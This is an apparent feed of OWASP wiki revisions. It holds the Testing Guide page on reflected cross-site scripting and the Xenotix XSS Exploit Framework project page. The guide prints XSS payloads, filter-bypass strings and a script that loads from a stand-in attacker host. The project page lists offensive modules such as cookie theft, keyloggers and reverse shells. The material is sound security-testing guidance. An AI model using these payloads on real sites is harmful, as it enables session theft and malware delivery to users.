{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)&amp;diff=175213</id>
		<title>Testing for Reflected Cross site scripting (OTG-INPVAL-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)&amp;diff=175213"/>
				<updated>2014-05-18T09:34:58Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v4}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&lt;br /&gt;
Reflected [[Cross-site Scripting (XSS)]] occur when an attacker injects browser executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page. The attack string is included as part of the crafted URI or HTTP parameters, improperly processed by the application, and returned to the victim.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&lt;br /&gt;
Reflected XSS are the most frequent type of XSS attacks found in the wild.&lt;br /&gt;
&lt;br /&gt;
Reflected XSS attacks are also known as non-persistent XSS attacks and, since the attack payload is delivered and executed via a single request and response, they are also referred to as first-order or type 1 XSS.&lt;br /&gt;
&lt;br /&gt;
When a web application is vulnerable to this type of attack, it will &lt;br /&gt;
pass unvalidated input sent through requests back to the client. The common modus &lt;br /&gt;
operandi of the attack includes a design step, in which the attacker &lt;br /&gt;
creates and tests an offending URI, a social engineering step, in which &lt;br /&gt;
she convinces her victims to load this URI on their browsers, and the eventual &lt;br /&gt;
execution of the offending code using the victim's browser. &lt;br /&gt;
&lt;br /&gt;
Commonly the attacker's code is written in the Javascript language, but  &lt;br /&gt;
other scripting languages are also used, e.g., ActionScript and VBScript. &lt;br /&gt;
&lt;br /&gt;
Attackers typically leverage these vulnerabilities to &lt;br /&gt;
install key loggers, steal victim cookies, perform clipboard theft, and &lt;br /&gt;
change the content of the page (e.g., download links). &lt;br /&gt;
&lt;br /&gt;
One of the primary difficulties in preventing XSS vulnerabilities is proper character encoding. &lt;br /&gt;
In some cases, the web server or the web application could not be filtering some &lt;br /&gt;
encodings of characters, so, for example, the web application might filter out &amp;quot;&amp;lt;script&amp;gt;&amp;quot;, &lt;br /&gt;
but might not filter %3cscript%3e which simply includes another encoding of tags.&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
A black-box test will include at least three phases:&lt;br /&gt;
&lt;br /&gt;
1. Detect input vectors. For each web page, the tester must determine all the web application's user-defined variables and how to input them. This includes hidden or non-obvious inputs such as HTTP parameters, POST data, hidden form field values, and predefined radio or selection values. Typically in-browser HTML editors or web proxies are used to view these hidden variables. See the example below.&lt;br /&gt;
&lt;br /&gt;
2. Analyze each input vector to detect potential vulnerabilities. To detect an XSS vulnerability, the tester will typically use specially crafted input data with each input vector. Such input data is typically harmless, but trigger responses from the web browser that manifests the vulnerability. Testing data can be generated by using a web application fuzzer, an automated predefined list of known attack strings, or manually. &amp;lt;br /&amp;gt;Some example of such input data are the following:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
“&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
For a comprehensive list of potential test strings, see the [[XSS Filter Evasion Cheat Sheet]].&lt;br /&gt;
&lt;br /&gt;
3. For each test input attempted in the previous phase, the tester will analyze the result and determine if it represents a vulnerability that has a realistic impact on the web application's security. This requires examining the resulting web page HTML and searching for the test input. Once found, the tester identifies any special characters that were not properly encoded, replaced, or filtered out. The set of vulnerable unfiltered special characters will depend on the context of that section of HTML. &lt;br /&gt;
&lt;br /&gt;
Ideally all HTML special characters will be replaced with HTML entities. The key HTML entities to identify are: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;gt; (greater than) &lt;br /&gt;
&amp;lt; (less than) &lt;br /&gt;
&amp;amp; (ampersand)&lt;br /&gt;
' (apostrophe or single quote)&lt;br /&gt;
&amp;quot; (double quote)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, a full list of entities is defined by the HTML and XML specifications. Wikipedia has a complete reference [http://en.wikipedia.org/wiki/List_of_XML_and_HTML_character_entity_references].&lt;br /&gt;
&lt;br /&gt;
Within the context of an HTML action or JavaScript code, a different set of special characters will need to be escaped, encoded, replaced, or filtered out. These characters include: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
\n (new line)&lt;br /&gt;
\r (carriage return)&lt;br /&gt;
\' (apostrophe or single quote)&lt;br /&gt;
\&amp;quot; (double quote)&lt;br /&gt;
\\ (backslash)&lt;br /&gt;
\uXXXX (unicode values)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For a more complete reference, see the Mozilla JavaScript guide. [https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Values,_variables,_and_literals#Using_special_characters_in_strings]&lt;br /&gt;
&lt;br /&gt;
=== Example 1 ===&lt;br /&gt;
For example, consider a site that has a welcome notice &amp;quot; Welcome %username% &amp;quot; and a download link. &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:XSS Example1.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
The tester must suspect that every data entry point can result in an XSS attack. To analyze it, the tester will play with the user variable and try to trigger the vulnerability. &lt;br /&gt;
Let's try to click on the following link and see what happens:&lt;br /&gt;
&amp;lt;pre&amp;gt;http://example.com/index.php?user=&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If no sanitization is applied this will result in the following popup:&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:alert.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
This indicates that there is an XSS vulnerability and it appears that the tester can execute code of his choice in anybody's browser if he clicks on the tester's link.&lt;br /&gt;
&lt;br /&gt;
=== Example 2 ===&lt;br /&gt;
Let's try other piece of code (link):&lt;br /&gt;
&amp;lt;pre&amp;gt;http://example.com/index.php?user=&amp;lt;script&amp;gt;window.onload = function() {var AllLinks=document.getElementsByTagName(&amp;quot;a&amp;quot;); &lt;br /&gt;
AllLinks[0].href = &amp;quot;http://badexample.com/malicious.exe&amp;quot;; }&amp;lt;/script&amp;gt; &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This produces the following behavior:&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:XSS Example2.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
This will cause the user, clicking on the link supplied by the tester, to download the file malicious.exe from a site he controls.&lt;br /&gt;
&lt;br /&gt;
== Bypass XSS filters  ==&lt;br /&gt;
Reflected cross-site scripting attacks are prevented as the web application sanitizes input, a web&lt;br /&gt;
application firewall blocks malicious input, or by mechanisms embedded in modern web browsers.&lt;br /&gt;
&lt;br /&gt;
The tester must test for vulnerabilities assuming that web browsers will not prevent the attack. Browsers may be out of date, or have built-in security features disabled.&lt;br /&gt;
&lt;br /&gt;
Similarly, web application firewalls are not guaranteed to recognize novel, unknown attacks. An attacker could craft an attack string that is unrecognized by the web application firewall.&lt;br /&gt;
&lt;br /&gt;
Thus, the majority of XSS prevention must depend on the web application's sanitization of untrusted user input. There are several mechanisms available to developers for sanitization, such as returning an error, removing, encoding, or replacing invalid input. The means by which the application detects and corrects invalid input is another primary weakness in preventing XSS. A blacklist may not include all possible attack strings, a whitelist may be overly permissive, the sanitization could fail, or a type of input may be incorrectly trusted and remain unsanitized. All of these allow attackers to circumvent XSS filters.&lt;br /&gt;
&lt;br /&gt;
The [[XSS Filter Evasion Cheat Sheet]] documents common filter evasion tests.&lt;br /&gt;
&lt;br /&gt;
=== Example 3: Tag Attribute Value ===&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Since these filters are based on a blacklist, they could not block every type of expressions. In fact, there are cases in which an XSS exploit can be carried out without the use of &amp;lt;script&amp;gt; tags and even without the use of characters such as &amp;quot; &amp;lt; &amp;gt; and / that are commonly filtered.&lt;br /&gt;
For example, the web application could use the user input value to fill an attribute, as shown in the following code:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;text&amp;quot; name=&amp;quot;state&amp;quot; value=&amp;quot;INPUT_FROM_USER&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Then an attacker could submit the following code:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;quot; onfocus=&amp;quot;alert(document.cookie)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Example 4: Different syntax or enconding ===&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
In some cases it is possible that signature-based filters can be simply defeated by obfuscating the attack. Typically you can do this through the insertion of unexpected variations in the syntax or in the enconding. These variations are tolerated by browsers as valid HTML when the code is returned, and yet they could also be accepted by the filter. &lt;br /&gt;
Following some examples:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;quot;&amp;gt;&amp;lt;script &amp;gt;alert(document.cookie)&amp;lt;/script &amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;quot;&amp;gt;&amp;lt;ScRiPt&amp;gt;alert(document.cookie)&amp;lt;/ScRiPt&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(document.cookie)%3c/script%3e&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Example 5: Bypassing non-recursive filtering ===&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes the sanitization is applied only once and it is not being performed recursively. In this case the attacker can beat the filter by sending a string containing multiple attempts, like this one:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;scr&amp;lt;script&amp;gt;ipt&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Example 6: Including external script ===&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Now suppose that developers of the target site implemented the following code to protect the input from the inclusion of external script: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?&lt;br /&gt;
   $re = &amp;quot;/&amp;lt;script[^&amp;gt;]+src/i&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
   if (preg_match($re, $_GET['var'])) &lt;br /&gt;
   {&lt;br /&gt;
      echo &amp;quot;Filtered&amp;quot;;&lt;br /&gt;
      return; &lt;br /&gt;
   }&lt;br /&gt;
   echo &amp;quot;Welcome &amp;quot;.$_GET['var'].&amp;quot; !&amp;quot;;&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In this scenario there is a regular expression checking if &amp;lt;b&amp;gt;&amp;lt;script [anything but the character: '&amp;gt;' ] src&amp;lt;/b&amp;gt; is inserted. This is useful for filtering expressions like &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;script src=&amp;quot;http://attacker/xss.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
which is a common attack. But, in this case, it is possible to bypass the sanitization by using the &amp;quot;&amp;gt;&amp;quot; character in an attribute between script and src, like this: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://example/?var=&amp;lt;SCRIPT%20a=&amp;quot;&amp;gt;&amp;quot;%20SRC=&amp;quot;http://attacker/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt; &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This will exploit the reflected cross site scripting vulnerability shown before, executing the javascript code stored on the attacker's web server as if it was &lt;br /&gt;
originating from the victim web site, http://example/. &lt;br /&gt;
&lt;br /&gt;
=== Example 7: HTTP Parameter Pollution (HPP) ===&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another method to bypass filters is the HTTP Parameter Pollution, this technique was first presented by Stefano di Paola and Luca Carettoni in 2009 at the OWASP &lt;br /&gt;
Poland conference. See the [[Testing for HTTP Parameter pollution (OWASP-DV-004)|Testing for HTTP Parameter pollution]] for more information. &lt;br /&gt;
This evasion technique consists of splitting an attack vector between multiple parameters that have the same name. The manipulation of the value of each &lt;br /&gt;
parameter depends on how each web technology is parsing these parameters, so this type of evasion is not always possible.&lt;br /&gt;
If the tested environment concatenates the values of all parameters with the same name, then an attacker could use this technique in order to bypass pattern-&lt;br /&gt;
based security mechanisms.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Regular attack: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://example/page.php?param=&amp;lt;script&amp;gt;[...]&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Attack using HPP:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://example/page.php?param=&amp;lt;script&amp;amp;param=&amp;gt;[...]&amp;lt;/&amp;amp;param=script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' Result expected '''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
See the [[XSS Filter Evasion Cheat Sheet]] for a more detailed list of filter evasion techniques.&lt;br /&gt;
Finally, analyzing answers can get complex. A simple way to do this is to use code that pops up a dialog, as in our example. This typically indicates that an attacker could execute arbitrary JavaScript of his choice in the visitors' browsers. &lt;br /&gt;
&lt;br /&gt;
== Gray Box testing ==&lt;br /&gt;
Gray Box testing is similar to Black box testing. In gray box testing, the pen-tester has partial knowledge of the application. In this case, information regarding user input, input validation controls, and how the user input is rendered back to the user might be known by the pen-tester. &lt;br /&gt;
&lt;br /&gt;
If source code is available (White Box), all variables received from users should be analyzed. Moreover the tester should analyze any sanitization procedures implemented to decide if these can be circumvented. &lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''OWASP Resources'''&amp;lt;br&amp;gt;&lt;br /&gt;
*[[XSS Filter Evasion Cheat Sheet]] &lt;br /&gt;
'''Books'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Joel Scambray, Mike Shema, Caleb Sima - &amp;quot;Hacking Exposed Web Applications&amp;quot;, Second Edition, McGraw-Hill, 2006 - ISBN 0-07-226229-0&lt;br /&gt;
* Dafydd Stuttard, Marcus Pinto - &amp;quot;The Web Application's Handbook - Discovering and Exploiting Security Flaws&amp;quot;, 2008, Wiley, ISBN 978-0-470-17077-9&lt;br /&gt;
* Jeremiah Grossman, Robert &amp;quot;RSnake&amp;quot; Hansen, Petko &amp;quot;pdp&amp;quot; D. Petkov, Anton Rager, Seth Fogie - &amp;quot;Cross Site Scripting Attacks: XSS Exploits and Defense&amp;quot;, 2007, Syngress, ISBN-10: 1-59749-154-3&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* '''CERT''' - Malicious HTML Tags Embedded in Client Web Requests: [http://www.cert.org/advisories/CA-2000-02.html Read]&lt;br /&gt;
* '''Rsnake''' - XSS Cheat Sheet: [http://ha.ckers.org/xss.html Read]&lt;br /&gt;
* '''cgisecurity.com''' - The Cross Site Scripting FAQ: [http://www.cgisecurity.com/articles/xss-faq.shtml Read]&lt;br /&gt;
* '''G.Ollmann''' - HTML Code Injection and Cross-site scripting: [http://www.technicalinfo.net/papers/CSS.html Read]&lt;br /&gt;
* '''A. Calvo, D.Tiscornia''' - alert('A javascritp agent'): [http://corelabs.coresecurity.com/index.php?module=FrontEndMod&amp;amp;action=view&amp;amp;type=publication&amp;amp;name=alert%28A_javascritp_agent%29 Read] ( To be published )&lt;br /&gt;
* '''S. Frei, T. Dübendorfer, G. Ollmann, M. May''' - Understanding the Web browser threat: [http://www.techzoom.net/publications/insecurity-iceberg/index.en Read]&lt;br /&gt;
'''Tools''' &amp;lt;br&amp;gt;&lt;br /&gt;
* '''[[OWASP CAL9000 Project|OWASP CAL9000]]''' &lt;br /&gt;
CAL9000 is a collection of web application security testing tools that complement the feature set of current web proxies and automated scanners. It's hosted as a reference at http://yehg.net/lab/pr0js/pentest/CAL9000/ .&lt;br /&gt;
* '''PHP Charset Encoder(PCE)''' - http://h4k.in/encoding [mirror: http://yehg.net/e ]&lt;br /&gt;
This tool helps you encode arbitrary texts to and from 65 kinds of charsets. Also some encoding functions featured by JavaScript are provided.&lt;br /&gt;
* '''HackVertor''' -  http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php&lt;br /&gt;
It provides multiple dozens of flexible encoding for advanced string manipulation attacks.&lt;br /&gt;
* '''[[OWASP WebScarab Project|WebScarab]]'''&lt;br /&gt;
WebScarab is a framework for analysing applications that communicate using the HTTP and HTTPS protocols. &lt;br /&gt;
* '''XSS-Proxy''' - http://xss-proxy.sourceforge.net/&lt;br /&gt;
XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool.&lt;br /&gt;
* '''ratproxy''' - http://code.google.com/p/ratproxy/&lt;br /&gt;
A semi-automated, largely passive web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.&lt;br /&gt;
* '''Burp Proxy''' - http://portswigger.net/proxy/&lt;br /&gt;
Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications.&lt;br /&gt;
* '''OWASP Zed Attack Proxy (ZAP)''' - [[OWASP_Zed_Attack_Proxy_Project]]&lt;br /&gt;
ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.&lt;br /&gt;
* '''OWASP Xenotix XSS Exploit Framework''' - [[OWASP_Xenotix_XSS_Exploit_Framework]]&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=175124</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=175124"/>
				<updated>2014-05-15T15:41:29Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: image resize&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 5==&lt;br /&gt;
&lt;br /&gt;
[[Image:XenotixV5.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Download.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
* [[OWASP_AntiSamy_Project]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*POST Request Scanner&lt;br /&gt;
*Request Repeater&lt;br /&gt;
*URL Fuzzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
*Browser Fingerprinting&lt;br /&gt;
*Browser Features Detector&lt;br /&gt;
*Get Network IP&lt;br /&gt;
*Ping Scan&lt;br /&gt;
*Port Scan&lt;br /&gt;
*Internal Network Scan&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Phisher&lt;br /&gt;
*Tabnabbing&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*Gram WebCam Screenshot&lt;br /&gt;
*Executable Drive By&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Drive-By Reverse Shell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Firefox Reverse Shell Addon (Persistent)&lt;br /&gt;
*Firefox Session Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Keylogger Addon (Persistent)&lt;br /&gt;
*Firefox DDoSer Addon (Persistent)&lt;br /&gt;
*Firefox Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Download and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''UTILITY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Payload Encoder&lt;br /&gt;
*JavaScript Beautify&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
